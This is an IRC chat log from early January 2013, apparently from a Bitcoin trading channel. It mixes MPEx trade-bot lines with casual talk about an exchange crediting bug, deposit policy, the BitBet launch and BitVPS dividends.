@ 0.00066 = 9.9997 BTC [+] Jan 05 21:33:25 [MPEX] [S.DICE] 3550 @ 0.00441901 = 15.6875 BTC [-] Jan 05 21:36:30 smickles: soebot foundation is nonprofit seeking donations?! Jan 05 21:38:00 jurov: I know you want to send blankets or water, just send your cash. Jan 05 21:41:14 [MPEX] [S.DICE] 1000 @ 0.00445899 = 4.459 BTC [+] Jan 05 21:41:14 smickles, you should have used coinbr. there was a bug with order cancellation, if done cautiously, you could have gotten your cash Jan 05 21:41:34 jurov: my new spokesperson http://www.youtube.com/watch?v=ibMf68i4rz8 Jan 05 21:41:37 out of my pocket Jan 05 21:42:36 lol what bug was that ? Jan 05 21:44:00 i did some fixes to better adapt for delayed mpex order cancellation Jan 05 21:44:27 and basically, mismatched the sign, so user got credited btc twice Jan 05 21:44:49 as chief scientist of the pigeon group i can help with that Jan 05 21:45:06 as it effected only partially executed orders, it went unnoticed till yesterday Jan 05 21:45:30 ouch. Jan 05 21:45:56 so the particular users got 190 BTC, went on a binge draining other users' balance to buy S.DICE Jan 05 21:46:14 and then he came here complaining about the 25BTC deposit Jan 05 21:46:25 damn Jan 05 21:46:37 have you talked to him bout it? Jan 05 21:47:02 rollback! Jan 05 21:47:10 i'm waiting whole day for him to appear Jan 05 21:47:24 or to send email.. got nothing Jan 05 21:48:11 add to that, it happened at worst possible time, i could not react quickly and in meantime other users put other orders(or tried to) Jan 05 21:49:03 but no serious harm was done, except the recovery got much more complicated Jan 05 21:49:25 jurov ouch! Jan 05 21:50:16 well, let me quote Jan 05 21:50:22 in case you don't have it Jan 05 21:50:47 can you hit him up about it; I'll be in Vegas for CES and probably can't stop by. Jan 05 21:50:47 sure. Jan 05 21:51:01 i imagine he shows up tomorrow or w/e Jan 05 21:52:16 okay. i'll be definitely interested to know how 190BTC credit could have gone unnoticed. Jan 05 21:54:24 i guess you can impound his shares till resolved. Jan 05 21:54:50 well, I for one have never noticed 190btc showing up in my account Jan 05 21:55:19 it is already resolved, im doing last checks, then open the gates Jan 05 21:55:28 fortunately s.dice went up Jan 05 21:55:39 so i don't have to cover Jan 05 21:56:39 and i thought you were a little grumpy today lol. well no wonder :p Jan 05 21:57:17 and as to that deposit, if it wasn't already said, mpex policy is apparently that if you round or typo even few satoshi for deposit Jan 05 21:57:22 it is treated as donation Jan 05 21:57:27 yes? Jan 05 21:57:47 in the worst case Jan 05 21:57:54 bulanula/nethead method Jan 05 21:57:58 ie if you're an ass about it. Jan 05 21:58:14 this is how goat got about 1.5 btc impounded back in 2011 and he's been ragging on mpex ever since Jan 05 21:58:23 well... ever since before he got banned/whatever Jan 05 22:00:31 but otherwise, the problem we have here is this : you're sending noobs to deposit to mpex, they're doing noobish things. mpex isn't made, or even able to cope with noobs. so that doesn't work too well. Jan 05 22:01:24 why don't you make a nice deposit page so they can deposit straight to coinbr, and float them yourself, like normal people ? Jan 05 22:01:51 i think you should make it so they deposit to weexchange.co, then it funds coinbr ;) Jan 05 22:03:51 well whichever way that doesn't have people rediscovering that whatever fashionable app is borkt every six days and a half. Jan 05 22:05:20 i didn't know goat was butthurt over losing 1.5 btc in an error to mpex Jan 05 22:06:50 was way early. Jan 05 22:07:08 back in the old mpoe days. page went like send X exactly, if you don't we keep it etc Jan 05 22:07:16 yeah it was clear Jan 05 22:07:21 he sent 1.5 btc and was liek "hey, i would like some options plx kthx" Jan 05 22:07:33 and then "what are you going to do about it!!1" Jan 05 22:07:48 yes he is known for his people skills and tact Jan 05 22:08:08 well, we already discussed it privately and i think you will have to deal with deposit problems sooner or later Jan 05 22:08:29 Seems fine to me. Jan 05 22:08:36 so is this an official request to discontinue coinbr direct deposit function? Jan 05 22:09:19 indirect deposit is already working, it's no problem to disable the other one Jan 05 22:11:21 man this cosse noir is incredible Jan 05 22:11:27 i forgot it in the fridge. Jan 05 22:11:46 jurov whats direct/indirect mean ? Jan 05 22:12:03 direct is that "sending noobs to deposit to mpex" Jan 05 22:12:16 indirect is funding into coinbr wallet first Jan 05 22:12:44 ok, then please bolt down in a basement somewherhe this direct thing Jan 05 22:12:50 it's a horrible thing. Jan 05 22:13:35 and i'll exceptionally credit these 25btc, seeing how most of the digits are there and you ask so nicely. Jan 05 22:13:53 BUT! FOR SRS! I AM KEEPING ROUNDED SUMS! NOOBS BEWARE! Jan 05 22:14:03 I only have 'em do direct when they want to deposit 9x btc than I've even had Jan 05 22:14:25 okay Jan 05 22:14:27 s/even/evar/ Jan 05 22:15:08 ahh Jan 05 22:16:16 smickles i fail to see the advantage in any event Jan 05 22:16:37 it becomes a mess of assignments whereby the person with the key is not the person who signed the btc and etfc. Jan 05 22:17:19 mircea_popescu: yeah, prolly no advantage except the lenght of the process Jan 05 22:17:35 and that's not too much of a benifit Jan 05 22:17:41 bene* Jan 05 22:18:47 bah and now i fucked up the deposit. Jan 05 22:18:48 sigh Jan 05 22:18:54 lol Jan 05 22:19:10 all the sudden I have 25btc :D Jan 05 22:19:16 j/k jk Jan 05 22:21:17 too late buster, -25 btc to you! Jan 05 22:21:52 btw, someone nice enough to put bitbet on reddit ? Jan 05 22:23:05 http://www.reddit.com/r/Bitcoin/comments/160tbh/bitcoin_betting_without_an_account/ Jan 05 22:23:08 :P Jan 05 22:23:21 you should give me 0.01 BTC for that :) Jan 05 22:23:25 [MPEX] [S.DICE] 2550 @ 0.00442 = 11.271 BTC [-] Jan 05 22:23:41 make a bet an' i will. Jan 05 22:23:59 I alread placed a couple of bets Jan 05 22:24:26 no i mean, a new one Jan 05 22:24:38 as in, a proposition Jan 05 22:29:21 people who use "satoshi nakamot" as their online nickname (and aren't satoshi) are retarded Jan 05 22:29:40 there is this guy on linkedin that uses it and posts all these bitcoin articles Jan 05 22:29:49 lol Jan 05 22:30:36 back Jan 05 22:30:40 what did i mis Jan 05 22:30:40 s Jan 05 22:30:50 o hai. Jan 05 22:30:56 hello Jan 05 22:31:15 heya Jan 05 22:31:29 bitbet sold out yet? Jan 05 22:31:33 ah not quite. Jan 05 22:31:35 nefario made a hostile takeover bid for bitbet Jan 05 22:31:40 lol Jan 05 22:31:45 howmuch Jan 05 22:31:49 part of a pirate cartel Jan 05 22:31:57 i dunno, they wanna do some exotic stock swap deal Jan 05 22:32:01 "whatever was left from the double payments i made!!" Jan 05 22:32:02 lol Jan 05 22:32:08 a Jan 05 22:32:13 glbse stocks for bb Jan 05 22:33:16 i think it's some new thing paying 7% dividend Jan 05 22:34:07 also, say something https://bitcointalk.org/index.php?topic=134799.0 Jan 05 22:40:30 glbse has "emboldoned" folks like lambert (& usagi) to decide they are acceptable members of humanity https://bitcointalk.org/index.php?topic=134684.msg1436321#msg1436321 Jan 05 22:41:04 [MPEX] [S.DICE] 2265 @ 0.00442 = 10.0113 BTC [-] Jan 05 22:41:10 lmao you can't make this shit up Jan 05 22:41:20 not because you're not clever enough, but because it's way too dumb. Jan 05 22:42:20 "i think it costs 30BTC just to open an account? and I don't know how to use their PGP thing..." << this sums it up nicely. Jan 05 22:44:22 my toliet paper is a "smooth platform" Jan 05 22:46:16 [MPEX] [S.DICE] 450 @ 0.00442798 = 1.9926 BTC [+] Jan 05 22:46:17 [MPEX] [S.DICE] 1957 @ 0.00445184 = 8.7123 BTC [+] Jan 05 22:46:22 what does that even mean btw ? Jan 05 22:46:35 as in, no trades, smooth line ? Jan 05 22:47:04 with fancy glowing blue buttons Jan 05 22:47:11 a ok Jan 05 22:47:20 smooth = bootstrap Jan 05 22:47:51 "not sure why mpex.co makes it so god damn hard to trade..." Jan 05 22:47:58 you know, it's like...why do you think dood ? Jan 05 22:48:04 cause you should be in school, that's why. Jan 05 22:48:16 answer so obvious, yet "not sure". not sure y not sure. Jan 05 22:48:24 lol Jan 05 22:48:39 "but i'm very mature for my age, i've had lots of experiences n stuff" Jan 05 22:48:45 right-o. Jan 05 22:49:25 so those large bids are counter intuitive right now. Jan 05 22:49:31 for BBET Jan 05 22:49:38 its a trap Jan 05 22:50:00 Because it will sell the cheap block into the high bid and so forth Jan 05 22:50:06 and reach in the middle Jan 05 22:50:14 the cheap bids will never go through. Jan 05 22:51:47 well yea. Jan 05 22:51:56 in other news, from the bitbet rejected bets : Jan 05 22:52:22 "None of the representatives in the US Congress could figure out how to use MPEx if locked in a room with a computer for a week". Jan 05 22:52:41 lol Jan 05 22:52:57 trolls. Jan 05 22:55:12 When I push BTC, it's in satoshis? Jan 05 22:56:45 yup Jan 05 23:02:23 we need a good difficulty bet Jan 05 23:02:32 anyone with an idea Jan 05 23:02:42 ;;bc,stats Jan 05 23:02:49 Current Blocks: 215312 | Current Difficulty: 2979636.6169381 | Next Difficulty At Block: 215711 | Next Difficulty In: 399 blocks | Next Difficulty In About: 2 days, 12 hours, 57 minutes, and 30 seconds | Next Difficulty Estimate: 3253116.58774727 | Estimated Percent Change: 9.17829943606 Jan 05 23:08:03 [MPEX] [S.MPOE] 7796 @ 0.00065572 = 5.112 BTC [-] Jan 05 23:12:20 [MPEX] [S.DICE] 893 @ 0.00445184 = 3.9755 BTC [+] Jan 05 23:12:22 [MPEX] [S.DICE] 1895 @ 0.00445899 = 8.4498 BTC [+] Jan 05 23:17:45 ;;title https://bitcointalk.org/index.php?topic=134766.0;topicseen Jan 05 23:18:14 SCAM WARNING!! FROM User BitcoinDoubleSpender Jan 05 23:18:24 the content isn't interesting, i just thought you don't need to warn people, his nick already does Jan 05 23:27:03 [MPEX] [S.MPOE] 2704 @ 0.0006442 = 1.7419 BTC [-] Jan 05 23:29:23 why S.BBET does an IPO for 30BTC cash?? Jan 05 23:29:38 wtf?? Jan 05 23:31:49 total equity value of 100 BTC Jan 05 23:31:53 StarenseN, read the stuff. they will put other offer automatically when this one sells Jan 05 23:32:03 http://mpex.co/?mpsic=S.BBET Jan 05 23:32:04 ^^^^ Jan 05 23:33:41 StarenseN ity's not bbet's job to value itself. Jan 05 23:33:45 that's what there's a market for Jan 05 23:33:51 unsmooth as admittedly it is. Jan 05 23:35:36 mircea_popescu: how much bbet takes fee? Jan 05 23:35:56 1% Jan 05 23:36:32 i found a picture of smooth markets https://bitcointalk.org/index.php?topic=134684.msg1436637#msg1436637 Jan 05 23:36:58 lmao Jan 05 23:37:08 you know, the rate at which this place generates memes is astounding. Jan 05 23:37:19 i mean, just as a persay forinstance : is milk smooth ? Jan 05 23:39:02 haha Jan 05 23:39:27 first bet on the site Jan 05 23:39:29 S.MPOE will crash this Spring Jan 05 23:39:29 S.MPOE shares 30 day average price as reported by assbot under 0.0003 at any point before April 1st. Jan 05 23:39:42 ya Jan 05 23:39:52 aaand someone put 100 btc on NO Jan 05 23:40:00 how much is S.MPOE trading now? Jan 05 23:42:21 ;;ticker S.MPOE Jan 05 23:42:21 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Jan 05 23:42:28 the duck?? Jan 05 23:42:47 !ticker S.MPOE Jan 05 23:42:48 [MPEX:S.MPOE] 1day: 0.00063114 / 0.00065018 / 0.00066 (465887 shares, 302.91 BTC), 30day: 0.00050709 / 0.00060174 / 0.00066 (57480054 shares, 34,588.19 BTC) Jan 05 23:43:11 i guess they went with 50% of current 30day avg Jan 05 23:47:43 ty Jan 05 23:49:50 is there a claims site for getting our glue bottles from SATOSHISDAEMON.HORSE yet? Jan 05 23:50:06 lol Jan 05 23:50:58 lol not afaik Jan 05 23:51:07 it was bought back Jan 05 23:51:27 the horse went on to trail riding or something speed agnostic Jan 05 23:52:38 lol Jan 05 23:52:50 [MPEX] [S.DICE] 1700 @ 0.00445899 = 7.5803 BTC [+] Jan 05 23:54:35 http://evansracingllc.com/Stable_News.html Jan 05 23:54:53 Unfortunately, she appeared to want nothing to do with racing. We have made the decision to discontinue her racing career with our stable. We wish her new connections good luck in their pursuits with the three year old filly. Jan 05 23:55:08 um what the fuck Jan 05 23:55:14 this sounds like they're gonna marry her. Jan 05 23:55:35 sounds like glue to me Jan 05 23:55:46 there's luck involved in glue ? Jan 05 23:56:04 yeah the slower ones are more adhesive Jan 05 23:56:15 iirc they said trail riding in the thread but glue or catfood wasnt ruled out Jan 05 23:56:38 poor filly. Jan 05 23:57:00 [MPEX] [S.MPOE] 3500 @ 0.00065378 = 2.2882 BTC [+] Jan 05 23:57:13 http://3.bp.blogspot.com/_bN9se-ul_aE/S_mCrH-jHkI/AAAAAAAAChA/uah6bAyU23k/s1600/glue+factory.jpg Jan 05 23:58:55 (13:54) < pigeons> Unfortunately, she appeared to want nothing to do with racing. Jan 05 23:59:05 ^^^ Thats really quite the laugh. Jan 05 23:59:36 Tecshare lied about me scamming him « 1 2 3 All » usagi Jan 05 23:59:42 that forum. Jan 06 00:00:11 yeah he lied about the way i really scammed him, liar Jan 06 00:01:24 [MPEX] [S.DICE] 1600 @ 0.00445899 = 7.1344 BTC [+] Jan 06 00:01:56 Only a very limited portion of the Bitcoin Reserve will be available for buybacks. The Bitcoin Reserve's priority will be for balancing first, and then buybacks. I would rather have the fund's shares be traded on the open market, but I know that's not always possible. So, I hope a buyback policy will help in a very limited way with some investor's liquidity. Jan 06 00:01:56 ("Very limited" 3 times in one paragraph.) Jan 06 00:02:01 how to cause a bank run, 101 Jan 06 00:02:23 is that some usagi shit? Jan 06 00:05:17 no some other dood Jan 06 00:09:10 lmao wait. those havelok ppl actually pasted mpex stats w/o the signatures ? Jan 06 00:09:23 whatsensedoesthatmake.gif Jan 06 00:25:38 [MPEX] [S.DICE] 921 @ 0.00445899 = 4.1067 BTC [+] Jan 06 00:25:48 [MPEX] [S.DICE] 629 @ 0.00445911 = 2.8048 BTC [+] Jan 06 00:26:11 really? Jan 06 00:29:33 [MPEX] [S.DICE] 185 @ 0.00442 = 0.8177 BTC [-] Jan 06 00:29:35 [MPEX] [S.DICE] 1714 @ 0.00441901 = 7.5742 BTC [-] Jan 06 00:29:36 [MPEX] [S.DICE] 1051 @ 0.00441316 = 4.6382 BTC [-] Jan 06 00:37:49 tadada...coinbr back online Jan 06 00:39:43 if you want to buy S.BBET, it's is the very last item in new order combobox Jan 06 00:39:54 it's TODO Jan 06 00:45:48 they don't want you to know the name and email labels on their gpg key at hevelock i suppose Jan 06 00:49:20 [MPEX] [S.DICE] 2121 @ 0.00445911 = 9.4578 BTC [+] Jan 06 00:49:21 [MPEX] [S.DICE] 979 @ 0.00446604 = 4.3723 BTC [+] Jan 06 00:51:03 [MPEX] [S.DICE] 4771 @ 0.00446604 = 21.3075 BTC [+] Jan 06 00:51:04 [MPEX] [S.DICE] 229 @ 0.00446937 = 1.0235 BTC [+] Jan 06 00:57:02 [MPEX] [S.DICE] 1449 @ 0.00441316 = 6.3947 BTC [-] Jan 06 00:57:04 [MPEX] [S.DICE] 801 @ 0.00437 = 3.5004 BTC [-] Jan 06 00:59:41 that's nonsense, since i could look up teh trades they claim neh ? Jan 06 01:00:18 https://bitcointalk.org/index.php?topic=134766.msg1435323#msg1435323 is this listed on btcjam yet ? Jan 06 01:03:26 [MPEX] [S.BVPS] [PAID] 500000 @ 0.000003 = 1.5 BTC Jan 06 01:03:39 fuck, 50% more than sdice. Jan 06 01:03:55 xD Jan 06 01:04:06 heey i have some bvps.. Jan 06 01:05:05 lol Jan 06 01:05:05 [MPEX] [S.DICE] 4199 @ 0.00437 = 18.3496 BTC [-] Jan 06 01:05:05 [MPEX] [S.DICE] 601 @ 0.00436462 = 2.6231 BTC [-] Jan 06 01:05:10 mircea, so it's really 1.5BTC? Jan 06 01:05:14 no. Jan 06 01:05:31 who owns BIB?? Jan 06 01:05:39 MPEx ‏@MPEx1 Jan 06 01:05:39 S.BVPS paid a total dividend of 1.50000000 BTC to 500`000 outstanding shares. #dividend #bitcoin #btc Jan 06 01:05:46 umm Jan 06 01:05:52 xD Jan 06 01:05:52 i guess it is ?! Jan 06 01:06:02 but.. who owns BIB? who's Brendio? Jan 06 01:06:13 ;;getrating brendio Jan 06 01:06:14 WARNING: Currently not authenticated. User brendio, rated since Tue Sep 13 01:01:41 2011. Cumulative rating 30, from 16 total ratings. Received ratings: 16 positive, 0 negative. Sent ratings: 23 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=brendio Jan 06 01:06:25 forum guy Jan 06 01:06:28 for a moment i thought the dividend payment is going to be retconned again Jan 06 01:06:32 haven't seen him a whuile tho Jan 06 01:06:32 [MPEX] [S.BVPS] 1668 @ 0.00200003 = 3.3361 BTC [-] Jan 06 01:06:48 jurov teh assbot used to be the borkt. i guess not anymore maybe Jan 06 01:06:54 or its only a problem if divs >1k Jan 06 01:07:33 [MPEX] [S.DICE] 1025 @ 0.00446937 = 4.5811 BTC [+] Jan 06 01:07:34 [MPEX] [S.DICE] 812 @ 0.00449166 = 3.6472 BTC [+] Jan 06 01:07:52 yeah, the problem doesnt show always but thats not being fixed cause new api is in place Jan 06 01:08:12 ok Jan 06 01:10:05 1.5 BTC dividend, and no report, no announcement about the new owners, no compliance/statement on 2.2.g of the contract :( Jan 06 01:10:06 For the shareholders report: https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E#gid=0 Jan 06 01:10:16 oh, spoke too soon :) Jan 06 01:10:27 We don't really have a place to publish it. Jan 06 01:10:52 We had a 324$ fee which won't be there next months. Otherwise there would have been more. Jan 06 01:10:56 (e) The Directors solemnly promise and warrant that complete and accurate Statements of Profit and Loss for each calendar month will be published by them no later than by the fifth day of the new month. Under exceptional circumstances and for good cause the publishing of the Statements of Profit and Loss can be deferred no more than once in a calendar year so that the Statement of Profit and Loss of one month is published together with the Statem Jan 06 01:11:03 ??? Jan 06 01:11:54 But rg was apparently not giving 50% on previous divs but as much as he could. And we seem to have lost a few clients over rg's neglect of the business in the past months. Jan 06 01:12:32 We decided to make very detailed statements so everyone knows exactly what's going on with expenses/income Jan 06 01:12:54 what are the future plans Jan 06 01:13:27 Well we got things back to running smoothly. We'll now try to expand. Jan 06 01:13:44 We might advertise a lot in the coming months. Jan 06 01:14:11 The servers ain't full, so if we can get more clients, wouldn't raise expenses. Jan 06 01:15:18 https://btcjam.com/listings/1133 Jan 06 01:15:22 well good deal Namjies, keep those customers happy! :) Jan 06 01:15:51 aint that cute pigeons Jan 06 01:16:02 [MPEX] [S.MPOE] 5596 @ 0.00065378 = 3.6586 BTC [+] Jan 06 01:16:04 [MPEX] [S.MPOE] 1104 @ 0.00065325 = 0.7212 BTC [-] Jan 06 01:17:20 holy shit Namjies Jan 06 01:17:31 a spreadsheet! Jan 06 01:17:40 Yes. Very detailed. Jan 06 01:17:44 glad to see that :) Jan 06 01:17:55 spread shit Jan 06 01:18:17 jk jk Jan 06 01:18:26 awe.. heheh. ok brb. Jan 06 01:18:30 For a second I thought you didn't like it Jan 06 01:18:34 it does look good though, glad to see some statements Jan 06 01:18:41 bbs Jan 06 01:19:01 its cool, statements are cool Jan 06 01:19:06 and color Jan 06 01:19:17 color ones will make more money Jan 06 01:19:24 Well the WHMCS owned license won't be there next months. 325$. We won't have to pay 19$ monthly for it now. Jan 06 01:19:40 "bills" is a little vague Jan 06 01:19:43 pigeons, also if you put a pic of brain onto it, it will sell more Jan 06 01:19:54 kakobreklaa: "in the cloud" Jan 06 01:19:59 ;) Jan 06 01:20:14 Yeah, but it shows the amount in USD we've paid for it. Jan 06 01:20:24 As you can see, it matches the USD on server bills. Jan 06 01:20:30 cool Jan 06 01:20:54 Namjies how many vps-es are run by bitbps Jan 06 01:20:56 eh Jan 06 01:20:57 bitvps Jan 06 01:21:03 [MPEX] [S.MPOE] 4148 @ 0.00065325 = 2.7097 BTC [-] Jan 06 01:21:05 I'd have to check WHMCS, one sec. Jan 06 01:21:48 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16406983 BTC [-] Jan 06 01:22:02 [MPEX] [O.BTCUSD.P120T] 1 @ 0.08155862 BTC [-] Jan 06 01:22:24 [MPEX] [O.BTCUSD.C130T] 1 @ 0.1336008 BTC [-] Jan 06 01:22:39 [MPEX] [O.BTCUSD.P130T] 1 @ 0.11088032 BTC [-] Jan 06 01:23:13 looks like we have 115 active records Jan 06 01:23:24 one's me :D Jan 06 01:24:55 We have 863913 shares on 1 million apparently. Jan 06 01:26:14 So only 136087 owned by the public. Jan 06 01:26:57 Eh, that's not actually much. Jan 06 01:27:36 115 runing virtual servers? Jan 06 01:27:38 not that bad Jan 06 01:28:40 Namjies: weren't only 300`000 released to the public anyway? Jan 06 01:28:54 Well 500'000 on MPEx Jan 06 01:29:05 fucking romanian commas Jan 06 01:29:25 237592 left in S.BVPS account. Jan 06 01:29:26 better than romanian commies Jan 06 01:29:38 ahh. ok Jan 06 01:30:25 136087 public Jan 06 01:30:33 126321 in my account. Jan 06 01:31:13 I had lots of shares prior to rg leaving BitVPS =P Jan 06 01:31:37 If I had more time I'd offer to help more. Jan 06 01:31:55 I'm just too tied up with this other stuff. Jan 06 01:32:06 I've still got like 10k Jan 06 01:32:10 I paid them alot thinking the dividend paids were 50% of BitVPS's profit >.> Jan 06 01:32:29 Guess I have all the reasons to grow BitVPS now. Jan 06 01:33:22 when is this spreadsheet coming out? Jan 06 01:33:26 RG was doing no or little accounting. Jan 06 01:33:32 oww Jan 06 01:33:33 thats bad Jan 06 01:33:45 Aye, but he was giving much more than he should Jan 06 01:33:55 will you guys make everything automatic btw? Jan 06 01:34:17 for VPS provision? Aye Jan 06 01:36:33 good Jan 06 01:41:04 Aye, just sad we lost many customers over the last months apparently. Jan 06 01:43:31 ya gotta advertise a lot Jan 06 01:43:59 bad news travels fast when peoples tickes get neglected on stuff like their VPS -- many people use them to host wallets to make payments etc. Jan 06 01:44:30 if you stay on top of the technical issues and keep up the SLA -- that and some decent customer service will go a long way. Jan 06 01:45:04 It's not advertising, the issues from rg being too busy on his new job and the fact he half transfered us the login details (we didn't know the account to pay some bills/get support from datacenters) Jan 06 01:45:18 We had some downtime and hard time fixing things. Jan 06 01:45:26 All during the holidays =/ Jan 06 01:45:39 Now everything is back on track. Jan 06 01:46:13 Well it's good that you got the kinks worked out. :) Jan 06 01:46:15 aww..badluck Jan 06 01:46:28 Jumping into stuff like that can always get hairy. Jan 06 01:47:26 the knowledge transfer and roles/responsibilities is tough in a crunch, I know how that goes. Jan 06 01:48:51 mod6, in fact hosting wallets, at least with full client, is forbidden under bitvps TOS Jan 06 01:49:32 rg has thought of funding multiwallet patch for bitcoind to allow this Jan 06 01:49:43 oh hmm.. thought people used to do that Jan 06 01:50:00 maybe the blockchain just got too big... but I thought that he worked something out? Jan 06 01:50:07 maybe thats what you're referring to Jan 06 01:50:39 i don't know. i put together working prototype, but he hadn't time or whatever. Jan 06 01:50:56 We moved to bitpay to process payment. We'll lose 0.99% in fees. But like that there's no incentive to hack BitVPS for it's wallet. Plus nice features. Jan 06 01:51:05 We'll use an offline wallet. Jan 06 01:51:28 mod6 meant vps users, not bitvps as a whole Jan 06 01:51:45 It was just an unrelated comment Jan 06 01:52:06 ahh, i understand. Jan 06 01:57:53 now it's over...craziest birthday in my life Jan 06 01:58:32 ! happy birthday jurov Jan 06 01:58:45 thanks :) Jan 06 01:59:02 :) Jan 06 02:00:28 Happy Jan 6th er'ry body Jan 06 02:00:32 :D Jan 06 02:00:40 \o\ Jan 06 02:00:44 /o/ Jan 06 02:00:50 \o/ Jan 06 02:02:13 (*^*) Jan 06 02:02:41 Namjies how many vps-es are run by bitbps << ahaha so cute Jan 06 02:19:29 looks like bait orders for CoinBr.MPBPT-E work... 22BTC worth sold already Jan 06 02:20:16 maybe next month we can try BBET-like strategy Jan 06 02:23:17 not bad that huh :p Jan 06 02:37:44 mr. smickles Jan 06 02:43:31 ;;sell 1 BTC 1 MPExBTC "Fast MPEx funding. Fixed fee 0.1BTC" Jan 06 02:43:32 Order id 12732 created. Jan 06 02:43:43 30 BTC available atm Jan 06 02:45:52 there you go! order book ftw! Jan 06 03:05:18 http://www.reddit.com/r/Bitcoin/comments/160tbh/bitcoin_betting_without_an_account/ Jan 06 03:05:21 o hey 21 votes! Jan 06 03:07:56 http://bitbet.us/bet/25/ and a reddit bet Jan 06 03:12:45 nice :) Jan 06 03:13:30 thestrin1puller: howdy Jan 06 03:13:40 I'll have to go feed my daughter tho ;) Jan 06 03:13:46 is it urgent? Jan 06 03:15:12 http://www.reddit.com/r/Bitcoin/comments/160tbh/bitcoin_betting_without_an_account/c7rqyoe Jan 06 03:15:28 heh, well designed site, this ^ as evidence Jan 06 03:25:15 :) Jan 06 03:25:45 back Jan 06 03:26:11 mind telling the guy asking that it's mods that control the outcomes Jan 06 03:29:19 http://www.reddit.com/r/Bitcoin/comments/160tbh/bitcoin_betting_without_an_account/c7rr9z1 Jan 06 03:31:36 hehe ok Jan 06 03:31:47 ahhh, i have a good feeling about this site. ppl like it! Jan 06 03:52:56 lol "non-favoritism of either entity may easily be verified by third parties" Jan 06 03:57:24 wassat ? Jan 06 04:29:04 [MPEX] [S.DICE] 800 @ 0.00438454 = 3.5076 BTC [-] Jan 06 04:29:06 [MPEX] [S.DICE] 950 @ 0.00440251 = 4.1824 BTC [+] Jan 06 04:41:20 [MPEX] [S.MPOE] 8850 @ 0.00065993 = 5.8404 BTC [+] Jan 06 04:51:52 [MPEX] [S.DICE] 449 @ 0.00436462 = 1.9597 BTC [-] Jan 06 04:51:54 [MPEX] [S.DICE] 801 @ 0.00433089 = 3.469 BTC [-] Jan 06 05:17:48 wow! a lot of heavy betting on 12% at sd Jan 06 05:18:21 someone just pumped about 20k Jan 06 05:18:48 leotreasure on 12% ?! Jan 06 05:18:58 actually probably closer to 30k Jan 06 05:19:00 yes Jan 06 05:19:26 It's technically the same odds long term. Jan 06 05:19:38 this is true Jan 06 05:19:47 but on the long term we're all deadf. Jan 06 05:20:08 The best odds is on the lowest "win" odds Jan 06 05:20:15 Margin is lower Jan 06 05:20:52 Don't bet 500 BTC. Bet 0.01 x 50 000 on Less than 1 Jan 06 05:21:09 fees tho Jan 06 05:24:06 Ah, true Jan 06 05:24:17 Bet 500 BTC x 50 000 then. Jan 06 05:24:22 xD Jan 06 05:24:29 i was gonna say Jan 06 05:24:40 don't bet 1mn btc, bet 1000 1k Jan 06 05:27:42 The house should win 1.9% of bets. So you can actually bet about ~52 times as much as you have cash. Jan 06 05:28:11 So with 1 million BTC, you could make 52 million BTC bets. Jan 06 05:28:32 Then evoorhee is very, very happy Jan 06 05:28:41 lol Jan 06 05:29:00 ahhh, whales on bitbet :D Jan 06 05:29:07 miniwhales but still Jan 06 05:32:41 so was thinking is this allowed "this bet will reach over 100btc by tomorrow" Jan 06 05:33:05 and that that for 500 Jan 06 05:33:06 and 1000 Jan 06 05:33:08 and 5000 Jan 06 05:33:10 and 10k Jan 06 05:34:48 ... hmm Jan 06 05:35:23 I'd say a bet where user can make it happen directly... open to abuse Jan 06 05:37:00 kakobreklaa no. Jan 06 05:37:14 i know Jan 06 05:37:19 its a mindfuck Jan 06 05:37:30 [MPEX] [S.DICE] 2290 @ 0.00440251 = 10.0817 BTC [+] Jan 06 05:38:25 too meta anyway. Jan 06 05:40:10 ;;bc,stats Jan 06 05:40:11 Current Blocks: 215353 | Current Difficulty: 2979636.6169381 | Next Difficulty At Block: 215711 | Next Difficulty In: 358 blocks | Next Difficulty In About: 2 days, 7 hours, 5 minutes, and 32 seconds | Next Difficulty Estimate: 3252770.12040778 | Estimated Percent Change: 9.16667159737 Jan 06 05:40:23 hmm Jan 06 05:43:14 lmao bitbet is being attacked. Jan 06 05:43:23 i guess someone's figuring they're the competition ? Jan 06 05:50:22 [MPEX] [S.DICE] 500 @ 0.00437644 = 2.1882 BTC [-] Jan 06 06:06:19 [MPEX] [S.MPOE] 5450 @ 0.00065384 = 3.5634 BTC [-] Jan 06 06:08:06 Well it's getting good betting for something just out. Jan 06 06:08:10 [MPEX] [S.DICE] 1100 @ 0.00435721 = 4.7929 BTC [-] Jan 06 06:09:40 THE DICE! IT'S LOADED! I should double everytime I roll six but I roll six 1.9% less than I should statistically do. Jan 06 06:09:48 l;ol Jan 06 06:41:17 ;;tslb Jan 06 06:41:21 Time since last block: 3 minutes and 10 seconds Jan 06 06:50:34 [MPEX] [S.DICE] 1349 @ 0.00433089 = 5.8424 BTC [-] Jan 06 06:50:34 [MPEX] [S.DICE] 700 @ 0.00432627 = 3.0284 BTC [-] Jan 06 07:04:59 http://bitbet.us/bet/27/ << network diff bet if anyone cares. Jan 06 07:05:58 ;;later tell bugpowder http://bitbet.us/bet/23/ Jan 06 07:05:59 The operation succeeded. **** BEGIN LOGGING AT Sun Jan 6 15:31:25 2013 Jan 06 15:32:38 what do u call "short term" Jan 06 15:32:53 a month a year a week ? Jan 06 15:33:04 a day for me Jan 06 15:33:32 44 up votes 11 down votes Jan 06 15:33:37 omfg who are the 11 assholes! Jan 06 15:33:55 on the bet ? Jan 06 15:37:01 I have a weird key issue... I will fix Jan 06 15:37:40 is this some new microsoft keyboard ? Jan 06 15:39:44 mp which post? Jan 06 15:40:05 nvm found it Jan 06 15:41:05 http://www.reddit.com/r/Bitcoin/comments/160tbh/bitcoin_betting_without_an_account/ Jan 06 15:41:06 mircea_popescu: who made bitbet, you? Jan 06 15:41:10 kakobreklaa mostly. Jan 06 15:41:21 im just there to keep it from being really successful. Jan 06 15:41:59 yeah, mpoe-pr will make sure of that :P Jan 06 15:42:18 hater. Jan 06 15:43:20 are you really going to sabotage it? Jan 06 15:43:39 loool Jan 06 15:44:38 can I help sabotage it Jan 06 15:45:01 i will help for .1 btc Jan 06 15:46:02 make a bet lol Jan 06 15:46:10 i have a fun bet proposal: The Rota won't sentence anyone till...whatever Jan 